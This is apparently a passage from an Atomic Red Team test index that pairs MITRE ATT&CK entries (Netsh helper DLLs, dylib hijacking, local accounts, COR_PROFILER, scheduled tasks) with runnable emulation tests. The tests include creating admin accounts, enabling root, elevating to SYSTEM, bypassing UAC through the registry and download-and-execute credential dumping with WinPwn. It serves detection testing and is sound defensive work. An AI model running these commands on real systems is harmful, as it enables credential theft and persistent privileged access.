- name: Netsh Helper DLL Registration
auto_generated_guid: 3244697d-5a3a-4dfc-941c-550f69f91a4d
description: |
You can register a "helper dll" with Netsh as a persistance mechanism. The code in the dll is executed every time netsh.exe is called.
The NetshHelper.dll provided with the atomic will simply launch notepad when netsh.exe is run.
[Blog](https://htmlpreview.github.io/?https://github.com/MatthewDemaske/blogbackup/blob/master/netshell.html)
[Sample DLL code](https://github.com/outflanknl/NetshHelperBeacon)
supported_platforms:
- windows
input_arguments:
helper_file:
description: Path to DLL
type: path
default: PathToAtomicsFolder\T1546.007\bin\NetshHelper.dll
dependency_executor_name: powershell
dependencies:
- description: 'Helper DLL must exist on disk at specified location (#{helper_file})
'
prereq_command: 'if (Test-Path "#{helper_file}") { exit 0} else { exit 1}
'
get_prereq_command: |
New-Item -Type Directory (split-path "#{helper_file}") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.007/bin/NetshHelper.dll" -OutFile "#{helper_file}"
executor:
command: |
netsh.exe add helper "#{helper_file}"
taskkill /im notepad.exe /t /f > NUL 2>&1
cleanup_command: 'netsh.exe delete helper "#{helper_file}"
'
name: command_prompt
elevation_required: true
T1574.004:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--fc742192-19e3-466c-9eb5-964a97b29490
created: '2020-03-16T15:23:30.896Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1574/004
external_id: T1574.004
- source_name: MalwareUnicorn macOS Dylib Injection MachO
description: Amanda Rousseau. (2020, April 4). MacOS Dylib Injection Workshop.
Retrieved March 29, 2021.
url: https://malwareunicorn.org/workshops/macos_dylib_injection.html#5
- source_name: Apple Developer Doco Archive Run-Path
description: Apple Inc.. (2012, July 7). Run-Path Dependent Libraries. Retrieved
March 31, 2021.
url: https://developer.apple.com/library/archive/documentation/DeveloperTools/Conceptual/DynamicLibraries/100-Articles/RunpathDependentLibraries.html
- source_name: Wardle Dylib Hijacking OSX 2015
description: Patrick Wardle. (2015, March 1). Dylib Hijacking on OS X. Retrieved
March 29, 2021.
url: https://www.virusbulletin.com/uploads/pdf/magazine/2015/vb201503-dylib-hijacking.pdf
- source_name: Writing Bad Malware for OSX
description: Patrick Wardle. (2015). Writing Bad @$$ Malware for OS X. Retrieved
July 10, 2017.
url: https://www.blackhat.com/docs/us-15/materials/us-15-Wardle-Writing-Bad-A-Malware-For-OS-X.pdf
- source_name: Wardle Dylib Hijack Vulnerable Apps
description: Patrick Wardle. (2019, July 2). Getting Root with Benign AppStore
Apps. Retrieved March 31, 2021.
url: https://objective-see.com/blog/blog_0x46.html
- source_name: wardle artofmalware volume1
description: 'Patrick Wardle. (2020, August 5). The Art of Mac Malware Volume
0x1: Analysis. Retrieved November 17, 2024.'
url: https://taomm.org/vol1/read.html
- source_name: Github EmpireProject HijackScanner
description: Wardle, P., Ross, C. (2017, September 21). Empire Project Dylib
Hijack Vulnerability Scanner. Retrieved April 1, 2021.
url: https://github.com/EmpireProject/Empire/blob/master/lib/modules/python/situational_awareness/host/osx/HijackScanner.py
- source_name: Github EmpireProject CreateHijacker Dylib
description: Wardle, P., Ross, C. (2018, April 8). EmpireProject Create Dylib
Hijacker. Retrieved April 1, 2021.
url: https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/persistence/osx/CreateHijacker.py
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:39.243Z'
name: Dylib Hijacking
description: |-
Adversaries may execute their own payloads by placing a malicious dynamic library (dylib) with an expected name in a path a victim application searches at runtime. The dynamic loader will try to find the dylibs based on the sequential order of the search paths. Paths to dylibs may be prefixed with @rpath, which allows developers to use relative paths to specify an array of search paths used at runtime based on the location of the executable. Additionally, if weak linking is used, such as the LC_LOAD_WEAK_DYLIB function, an application will still execute even if an expected dylib is not present. Weak linking enables developers to run an application on multiple macOS versions as new APIs are added.
Adversaries may gain execution by inserting malicious dylibs with the name of the missing dylib in the identified path.(Citation: Wardle Dylib Hijack Vulnerable Apps)(Citation: Wardle Dylib Hijacking OSX 2015)(Citation: Github EmpireProject HijackScanner)(Citation: Github EmpireProject CreateHijacker Dylib) Dylibs are loaded into an application's address space allowing the malicious dylib to inherit the application's privilege level and resources. Based on the application, this could result in privilege escalation and uninhibited network access. This method may also evade detection from security products since the execution is masked under a legitimate process.(Citation: Writing Bad Malware for OSX)(Citation: wardle artofmalware volume1)(Citation: MalwareUnicorn macOS Dylib Injection MachO)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: defense-evasion
x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- macOS
x_mitre_version: '2.1'
atomic_tests: []
T1078.003:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--fdc47f44-dd32-4b99-af5f-209f556f63c2
created: '2020-03-13T20:26:46.695Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1078/003
external_id: T1078.003
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:39.874Z'
name: 'Valid Accounts: Local Accounts'
description: "Adversaries may obtain and abuse credentials of a local account
as a means of gaining Initial Access, Persistence, Privilege Escalation, or
Defense Evasion. Local accounts are those configured by an organization for
use by users, remote support, services, or for administration on a single
system or service.\n\nLocal Accounts may also be abused to elevate privileges
and harvest credentials through [OS Credential Dumping](https://attack.mitre.org/techniques/T1003).
Password reuse may allow the abuse of local accounts across a set of machines
on a network for the purposes of Privilege Escalation and Lateral Movement. "
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Linux
- macOS
- Windows
- Containers
- Network Devices
- ESXi
x_mitre_version: '1.5'
identifier: T1078.003
atomic_tests:
- name: Create local account with admin privileges
auto_generated_guid: a524ce99-86de-4db6-b4f9-e08f35a47a15
description: After execution the new account will be active and added to the
Administrators group
supported_platforms:
- windows
input_arguments:
password:
description: Password for art-test user
type: string
default: "-4RTisCool!-321"
executor:
command: |-
net user art-test /add
net user art-test #{password}
net localgroup administrators art-test /add
cleanup_command: |-
net localgroup administrators art-test /delete >nul 2>&1
net user art-test /delete >nul 2>&1
name: command_prompt
elevation_required: true
- name: Create local account with admin privileges - MacOS
auto_generated_guid: f1275566-1c26-4b66-83e3-7f9f7f964daa
description: After execution the new account will be active and added to the
Administrators group
supported_platforms:
- macos
executor:
command: |-
dscl . -create /Users/AtomicUser
dscl . -create /Users/AtomicUser UserShell /bin/bash
dscl . -create /Users/AtomicUser RealName "Atomic User"
dscl . -create /Users/AtomicUser UniqueID 503
dscl . -create /Users/AtomicUser PrimaryGroupID 503
dscl . -create /Users/AtomicUser NFSHomeDirectory /Local/Users/AtomicUser
dscl . -passwd /Users/AtomicUser mySecretPassword
dscl . -append /Groups/admin GroupMembership AtomicUser
cleanup_command: sudo dscl . -delete /Users/AtomicUser
name: bash
elevation_required: true
- name: Create local account with admin privileges using sysadminctl utility -
MacOS
auto_generated_guid: 191db57d-091a-47d5-99f3-97fde53de505
description: After execution the new account will be active and added to the
Administrators group
supported_platforms:
- macos
executor:
command: sysadminctl interactive -addUser art-tester -fullName ARTUser -password
!pass123! -admin
cleanup_command: sysadminctl interactive -deleteUser art-tester
name: bash
elevation_required: true
- name: Enable root account using dsenableroot utility - MacOS
auto_generated_guid: 20b40ea9-0e17-4155-b8e6-244911a678ac
description: After execution the current/new user will have root access
supported_platforms:
- macos
executor:
command: |-
dsenableroot #current user
dsenableroot -u art-tester -p art-tester -r art-root #new user
cleanup_command: |-
dsenableroot -d #current user
dsenableroot -d -u art-tester -p art-tester #new user
name: bash
elevation_required: true
- name: Add a new/existing user to the admin group using dseditgroup utility -
macOS
auto_generated_guid: 433842ba-e796-4fd5-a14f-95d3a1970875
description: After execution the current/new user will be added to the Admin
group
supported_platforms:
- macos
executor:
command: dseditgroup -o edit -a art-user -t user admin
cleanup_command: dseditgroup -o edit -d art-user -t user admin
name: bash
elevation_required: true
- name: WinPwn - Loot local Credentials - powerhell kittie
auto_generated_guid: 9e9fd066-453d-442f-88c1-ad7911d32912
description: Loot local Credentials - powerhell kittie technique via function
of WinPwn
supported_platforms:
- windows
executor:
command: |-
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
obfuskittiedump -consoleoutput -noninteractive
name: powershell
elevation_required: true
- name: WinPwn - Loot local Credentials - Safetykatz
auto_generated_guid: e9fdb899-a980-4ba4-934b-486ad22e22f4
description: Loot local Credentials - Safetykatz technique via function of WinPwn
supported_platforms:
- windows
executor:
command: |-
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
safedump -consoleoutput -noninteractive
name: powershell
elevation_required: true
- name: Create local account (Linux)
auto_generated_guid: 02a91c34-8a5b-4bed-87af-501103eb5357
description: 'An adversary may wish to create an account with admin privileges
to work with. In this test we create a "art" user with the password art, switch
to art, execute whoami, exit and delete the art user.
'
supported_platforms:
- linux
executor:
name: bash
elevation_required: true
command: |
password=$(openssl passwd -1 art)
([ "$(uname)" = 'Linux' ] && useradd --shell /bin/bash --create-home --password $password art) || (pw useradd art -g wheel -s /bin/sh && (echo $password | pw mod user testuser1 -h 0))
su art -c "whoami; exit"
cleanup_command: '[ "$(uname)" = ''Linux'' ] && userdel art -rf || rmuser
-y art
'
- name: Reactivate a locked/expired account (Linux)
auto_generated_guid: d2b95631-62d7-45a3-aaef-0972cea97931
description: "A system administrator may have locked and expired a user account
rather than deleting it. \"the user is coming back, at some stage\" An adversary
may reactivate a inactive account in an attempt to appear legitimate. \n\nIn
this test we create a \"art\" user with the password art, lock and expire
the account, try to su to art and fail, unlock and renew the account, su successfully,
then delete the account.\n"
supported_platforms:
- linux
executor:
name: bash
elevation_required: true
command: |
useradd --shell /bin/bash --create-home --password $(openssl passwd -1 art) art
usermod --lock art
usermod --expiredate "1" art
usermod --unlock art
usermod --expiredate "99999" art
su -c whoami art
cleanup_command: "userdel -r art \n"
- name: Reactivate a locked/expired account (FreeBSD)
auto_generated_guid: '09e3380a-fae5-4255-8b19-9950be0252cf'
description: "A system administrator may have locked and expired a user account
rather than deleting it. \"the user is coming back, at some stage\" An adversary
may reactivate a inactive account in an attempt to appear legitimate. \n\nIn
this test we create a \"art\" user with the password art, lock and expire
the account, try to su to art and fail, unlock and renew the account, su successfully,
then delete the account.\n"
supported_platforms:
- linux
executor:
name: sh
elevation_required: true
command: |
pw useradd art -g wheel -s /bin/sh
echo $(openssl passwd -1 art) | pw mod user testuser1 -h 0
pw lock art
pw usermod art -e +1d
pw unlock art
pw user mod art -e +99d
su art
whoami
exit
cleanup_command: "rmuser -y art \n"
- name: Login as nobody (Linux)
auto_generated_guid: 3d2cd093-ee05-41bd-a802-59ee5c301b85
description: 'An adversary may try to re-purpose a system account to appear
legitimate. In this test change the login shell of the nobody account, change
its password to nobody, su to nobody, exit, then reset nobody''s shell to
/usr/sbin/nologin. Here is how the nobody entry should look like in `/etc/passwd`
before the test is executed and right after the cleanup: `# -> nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin`
'
supported_platforms:
- linux
executor:
name: bash
elevation_required: true
command: |
cat /etc/passwd |grep nobody
chsh --shell /bin/bash nobody
usermod --password $(openssl passwd -1 nobody) nobody
su -c "whoami" nobody
cleanup_command: |
chsh --shell /usr/sbin/nologin nobody
cat /etc/passwd |grep nobody
# -> nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
- name: Login as nobody (freebsd)
auto_generated_guid: 16f6374f-7600-459a-9b16-6a88fd96d310
description: 'An adversary may try to re-purpose a system account to appear
legitimate. In this test change the login shell of the nobody account, change
its password to nobody, su to nobody, exit, then reset nobody''s shell to
/usr/sbin/nologin. Here is how the nobody entry should look like in `/etc/passwd`
before the test is executed and right after the cleanup: `# -> nobody:x:65534:65534:Unprivileged
user:/nonexistent:/usr/sbin/nologin`
'
supported_platforms:
- linux
executor:
name: sh
elevation_required: true
command: |
cat /etc/passwd |grep nobody
pw usermod nobody -s /bin/sh
echo $(openssl passwd -1 art) | pw mod user nobody -h 0
su nobody
whoami
exit
cleanup_command: |
pw usermod nobody -s /usr/sbin/nologin
cat /etc/passwd |grep nobody
# -> nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin
- name: Use PsExec to elevate to NT Authority\SYSTEM account
auto_generated_guid: 6904235f-0f55-4039-8aed-41c300ff7733
description: "PsExec is a powerful tool most known for its remote management
capability. However, it can also be used to run processes as the local system
account.\n\nThe local system account is a default windows account which has
unrestricted access to all system resources.\n\nUpon successful execution,
PsExec.exe will spawn a command prompt which will run 'whoami' as the local
system account and then exit. \n"
supported_platforms:
- windows
dependency_executor_name: powershell
dependencies:
- description: 'PsExec tool from Sysinternals must exist in the ExternalPayloads
directory
'
prereq_command: 'if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\PsExec.exe")
{ exit 0 } else { exit 1 }
'
get_prereq_command: |
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\PsTools.zip"
Expand-Archive "PathToAtomicsFolder\..\ExternalPayloads\PsTools.zip" "PathToAtomicsFolder\..\ExternalPayloads\PsTools" -Force
Copy-Item "PathToAtomicsFolder\..\ExternalPayloads\PsTools\PsExec.exe" "PathToAtomicsFolder\..\ExternalPayloads\PsExec.exe" -Force
executor:
name: command_prompt
elevation_required: true
command: '"PathToAtomicsFolder\..\ExternalPayloads\PsExec.exe" -accepteula
-s %COMSPEC% /c whoami
'
T1574.012:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--ffeb0780-356e-4261-b036-cfb6bd234335
created: '2020-06-24T22:30:55.843Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1574/012
external_id: T1574.012
- source_name: Microsoft Profiling Mar 2017
description: Microsoft. (2017, March 30). Profiling Overview. Retrieved June
24, 2020.
url: https://docs.microsoft.com/en-us/dotnet/framework/unmanaged-api/profiling/profiling-overview
- source_name: Microsoft COR_PROFILER Feb 2013
description: Microsoft. (2013, February 4). Registry-Free Profiler Startup
and Attach. Retrieved June 24, 2020.
url: https://docs.microsoft.com/en-us/previous-versions/dotnet/netframework-4.0/ee471451(v=vs.100)
- source_name: RedCanary Mockingbird May 2020
description: Lambert, T. (2020, May 7). Introducing Blue Mockingbird. Retrieved
May 26, 2020.
url: https://redcanary.com/blog/blue-mockingbird-cryptominer/
- source_name: Red Canary COR_PROFILER May 2020
description: Brown, J. (2020, May 7). Detecting COR_PROFILER manipulation
for persistence. Retrieved June 24, 2020.
url: https://redcanary.com/blog/cor_profiler-for-persistence/
- source_name: Almond COR_PROFILER Apr 2019
description: Almond. (2019, April 30). UAC bypass via elevated .NET applications.
Retrieved June 24, 2020.
url: https://offsec.almond.consulting/UAC-bypass-dotnet.html
- source_name: GitHub OmerYa Invisi-Shell
description: Yair, O. (2019, August 19). Invisi-Shell. Retrieved June 24,
2020.
url: https://github.com/OmerYa/Invisi-Shell
- source_name: subTee .NET Profilers May 2017
description: Smith, C. (2017, May 18). Subvert CLR Process Listing With .NET
Profilers. Retrieved June 24, 2020.
url: https://web.archive.org/web/20170720041203/http://subt0x10.blogspot.com/2017/05/subvert-clr-process-listing-with-net.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:40.510Z'
name: 'Hijack Execution Flow: COR_PROFILER'
description: |-
Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR. The COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR). These profilers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR.(Citation: Microsoft Profiling Mar 2017)(Citation: Microsoft COR_PROFILER Feb 2013)
The COR_PROFILER environment variable can be set at various scopes (system, user, or process) resulting in different levels of influence. System and user-wide environment variable scopes are specified in the Registry, where a [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM) object can be registered as a profiler DLL. A process scope COR_PROFILER can also be created in-memory without modifying the Registry. Starting with .NET Framework 4, the profiling DLL does not need to be registered as long as the location of the DLL is specified in the COR_PROFILER_PATH environment variable.(Citation: Microsoft COR_PROFILER Feb 2013)
Adversaries may abuse COR_PROFILER to establish persistence that executes a malicious DLL in the context of all .NET processes every time the CLR is invoked. The COR_PROFILER can also be used to elevate privileges (ex: [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002)) if the victim .NET process executes at a higher permission level, as well as to hook and [Impair Defenses](https://attack.mitre.org/techniques/T1562) provided by .NET processes.(Citation: RedCanary Mockingbird May 2020)(Citation: Red Canary COR_PROFILER May 2020)(Citation: Almond COR_PROFILER Apr 2019)(Citation: GitHub OmerYa Invisi-Shell)(Citation: subTee .NET Profilers May 2017)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: defense-evasion
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Jesse Brown, Red Canary
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.1'
identifier: T1574.012
atomic_tests:
- name: User scope COR_PROFILER
auto_generated_guid: 9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a
description: |
Creates user scope environment variables and CLSID COM object to enable a .NET profiler (COR_PROFILER).
The unmanaged profiler DLL (`T1574.012x64.dll`) executes when the CLR is loaded by the Event Viewer process.
Additionally, the profiling DLL will inherit the integrity level of Event Viewer bypassing UAC and executing `notepad.exe` with high integrity.
If the account used is not a local administrator the profiler DLL will still execute each time the CLR is loaded by a process, however,
the notepad process will not execute with high integrity.
Reference: https://redcanary.com/blog/cor_profiler-for-persistence/
supported_platforms:
- windows
input_arguments:
file_name:
description: unmanaged profiler DLL
type: path
default: PathToAtomicsFolder\T1574.012\bin\T1574.012x64.dll
clsid_guid:
description: custom clsid guid
type: string
default: "{09108e71-974c-4010-89cb-acf471ae9e2c}"
dependency_executor_name: powershell
dependencies:
- description: '"#{file_name}" must be present
'
prereq_command: 'if (Test-Path "#{file_name}") {exit 0} else {exit 1}
'
get_prereq_command: |
New-Item -Type Directory (split-path "#{file_name}") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}"
executor:
command: |
Write-Host "Creating registry keys in HKCU:Software\Classes\CLSID\#{clsid_guid}" -ForegroundColor Cyan
New-Item -Path "HKCU:\Software\Classes\CLSID\#{clsid_guid}\InprocServer32" -Value "#{file_name}" -Force | Out-Null
New-ItemProperty -Path HKCU:\Environment -Name "COR_ENABLE_PROFILING" -PropertyType String -Value "1" -Force | Out-Null
New-ItemProperty -Path HKCU:\Environment -Name "COR_PROFILER" -PropertyType String -Value "#{clsid_guid}" -Force | Out-Null
New-ItemProperty -Path HKCU:\Environment -Name "COR_PROFILER_PATH" -PropertyType String -Value "#{file_name}" -Force | Out-Null
Write-Host "executing eventvwr.msc" -ForegroundColor Cyan
START MMC.EXE EVENTVWR.MSC
cleanup_command: "Remove-Item -Path \"HKCU:\\Software\\Classes\\CLSID\\#{clsid_guid}\"
-Recurse -Force -ErrorAction Ignore \nRemove-ItemProperty -Path HKCU:\\Environment
-Name \"COR_ENABLE_PROFILING\" -Force -ErrorAction Ignore | Out-Null\nRemove-ItemProperty
-Path HKCU:\\Environment -Name \"COR_PROFILER\" -Force -ErrorAction Ignore
| Out-Null\nRemove-ItemProperty -Path HKCU:\\Environment -Name \"COR_PROFILER_PATH\"
-Force -ErrorAction Ignore | Out-Null\n"
name: powershell
- name: System Scope COR_PROFILER
auto_generated_guid: f373b482-48c8-4ce4-85ed-d40c8b3f7310
description: |
Creates system scope environment variables to enable a .NET profiler (COR_PROFILER). System scope environment variables require a restart to take effect.
The unmanaged profiler DLL (T1574.012x64.dll`) executes when the CLR is loaded by any process. Additionally, the profiling DLL will inherit the integrity
level of Event Viewer bypassing UAC and executing `notepad.exe` with high integrity. If the account used is not a local administrator the profiler DLL will
still execute each time the CLR is loaded by a process, however, the notepad process will not execute with high integrity.
Reference: https://redcanary.com/blog/cor_profiler-for-persistence/
supported_platforms:
- windows
input_arguments:
file_name:
description: unmanaged profiler DLL
type: path
default: PathToAtomicsFolder\T1574.012\bin\T1574.012x64.dll
clsid_guid:
description: custom clsid guid
type: string
default: "{09108e71-974c-4010-89cb-acf471ae9e2c}"
dependency_executor_name: powershell
dependencies:
- description: '"#{file_name}" must be present
'
prereq_command: 'if (Test-Path "#{file_name}") {exit 0} else {exit 1}
'
get_prereq_command: |
New-Item -Type Directory (split-path "#{file_name}") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}"
executor:
command: |
Write-Host "Creating system environment variables" -ForegroundColor Cyan
New-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_ENABLE_PROFILING" -PropertyType String -Value "1" -Force | Out-Null
New-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_PROFILER" -PropertyType String -Value "#{clsid_guid}" -Force | Out-Null
New-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_PROFILER_PATH" -PropertyType String -Value "#{file_name}" -Force | Out-Null
cleanup_command: |
Remove-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_ENABLE_PROFILING" -Force -ErrorAction Ignore | Out-Null
Remove-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_PROFILER" -Force -ErrorAction Ignore | Out-Null
Remove-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_PROFILER_PATH" -Force -ErrorAction Ignore | Out-Null
name: powershell
elevation_required: true
- name: Registry-free process scope COR_PROFILER
auto_generated_guid: 79d57242-bbef-41db-b301-9d01d9f6e817
description: |
Creates process scope environment variables to enable a .NET profiler (COR_PROFILER) without making changes to the registry. The unmanaged profiler DLL (`T1574.012x64.dll`) executes when the CLR is loaded by PowerShell.
Reference: https://redcanary.com/blog/cor_profiler-for-persistence/
supported_platforms:
- windows
input_arguments:
file_name:
description: unamanged profiler DLL
type: path
default: PathToAtomicsFolder\T1574.012\bin\T1574.012x64.dll
clsid_guid:
description: custom clsid guid
type: string
default: "{09108e71-974c-4010-89cb-acf471ae9e2c}"
dependency_executor_name: powershell
dependencies:
- description: '"#{file_name}" must be present
'
prereq_command: 'if (Test-Path "#{file_name}") {exit 0} else {exit 1}
'
get_prereq_command: |
New-Item -Type Directory (split-path "#{file_name}") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}"
executor:
command: |
$env:COR_ENABLE_PROFILING = 1
$env:COR_PROFILER = '#{clsid_guid}'
$env:COR_PROFILER_PATH = '"#{file_name}"'
POWERSHELL -c 'Start-Sleep 1'
cleanup_command: |
$env:COR_ENABLE_PROFILING = 0
$env:COR_PROFILER = ''
$env:COR_PROFILER_PATH = ''
name: powershell
execution:
T1053.005:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--005a06c6-14bf-4118-afa0-ebcd8aebb0c9
created: '2019-11-27T14:58:00.429Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1053/005
external_id: T1053.005
- source_name: ProofPoint Serpent
description: Campbell, B. et al. (2022, March 21). Serpent, No Swiping! New
Backdoor Targets French Entities with Unique Attack Chain. Retrieved April
11, 2022.
url: https://www.proofpoint.com/us/blog/threat-insight/serpent-no-swiping-new-backdoor-targets-french-entities-unique-attack-chain
- source_name: Defending Against Scheduled Task Attacks in Windows Environments
description: Harshal Tupsamudre. (2022, June 20). Defending Against Scheduled
Tasks. Retrieved July 5, 2022.
url: https://blog.qualys.com/vulnerabilities-threat-research/2022/06/20/defending-against-scheduled-task-attacks-in-windows-environments
- source_name: Twitter Leoloobeek Scheduled Task
description: Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved
September 12, 2024.
url: https://x.com/leoloobeek/status/939248813465853953
- source_name: Tarrask scheduled task
description: Microsoft Threat Intelligence Team & Detection and Response Team
. (2022, April 12). Tarrask malware uses scheduled tasks for defense evasion.
Retrieved June 1, 2022.
url: https://www.microsoft.com/security/blog/2022/04/12/tarrask-malware-uses-scheduled-tasks-for-defense-evasion/
- source_name: Microsoft Scheduled Task Events Win10
description: Microsoft. (2017, May 28). Audit Other Object Access Events.
Retrieved June 27, 2019.
url: https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-other-object-access-events
- source_name: TechNet Scheduled Task Events
description: Microsoft. (n.d.). General Task Registration. Retrieved December
12, 2017.
url: https://technet.microsoft.com/library/dd315590.aspx
- source_name: Red Canary - Atomic Red Team
description: 'Red Canary - Atomic Red Team. (n.d.). T1053.005 - Scheduled
Task/Job: Scheduled Task. Retrieved June 19, 2024.'
url: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md
- source_name: TechNet Autoruns
description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
Retrieved June 6, 2016.
url: https://technet.microsoft.com/en-us/sysinternals/bb963902
- source_name: TechNet Forum Scheduled Task Operational Setting
description: Satyajit321. (2015, November 3). Scheduled Tasks History Retention
settings. Retrieved December 12, 2017.
url: https://social.technet.microsoft.com/Forums/en-US/e5bca729-52e7-4fcb-ba12-3225c564674c/scheduled-tasks-history-retention-settings?forum=winserver8gen
- source_name: SigmaHQ
description: Sittikorn S. (2022, April 15). Removal Of SD Value to Hide Schedule
Task - Registry. Retrieved June 1, 2022.
url: https://github.com/SigmaHQ/sigma/blob/master/rules/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_sd_value_removal.yml
- source_name: Stack Overflow
description: Stack Overflow. (n.d.). How to find the location of the Scheduled
Tasks folder. Retrieved June 19, 2024.
url: https://stackoverflow.com/questions/2913816/how-to-find-the-location-of-the-scheduled-tasks-folder
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:19.176Z'
name: 'Scheduled Task/Job: Scheduled Task'
description: "Adversaries may abuse the Windows Task Scheduler to perform task
scheduling for initial or recurring execution of malicious code. There are
multiple ways to access the Task Scheduler in Windows. The [schtasks](https://attack.mitre.org/software/S0111)
utility can be run directly on the command line, or the Task Scheduler can
be opened through the GUI within the Administrator Tools section of the Control
Panel.(Citation: Stack Overflow) In some cases, adversaries have used a .NET
wrapper for the Windows Task Scheduler, and alternatively, adversaries have
used the Windows netapi32 library and [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047)
(WMI) to create a scheduled task. Adversaries may also utilize the Powershell
Cmdlet `Invoke-CimMethod`, which leverages WMI class `PS_ScheduledTask` to
create a scheduled task via an XML path.(Citation: Red Canary - Atomic Red
Team)\n\nAn adversary may use Windows Task Scheduler to execute programs at
system startup or on a scheduled basis for persistence. The Windows Task Scheduler
can also be abused to conduct remote Execution as part of Lateral Movement
and/or to run a process under the context of a specified account (such as
SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218),
adversaries have also abused the Windows Task Scheduler to potentially mask
one-time execution under signed/trusted system processes.(Citation: ProofPoint
Serpent)\n\nAdversaries may also create \"hidden\" scheduled tasks (i.e. [Hide
Artifacts](https://attack.mitre.org/techniques/T1564)) that may not be visible
to defender tools and manual queries used to enumerate tasks. Specifically,
an adversary may hide a task from `schtasks /query` and the Task Scheduler
by deleting the associated Security Descriptor (SD) registry value (where
deletion of this value must be completed using SYSTEM permissions).(Citation:
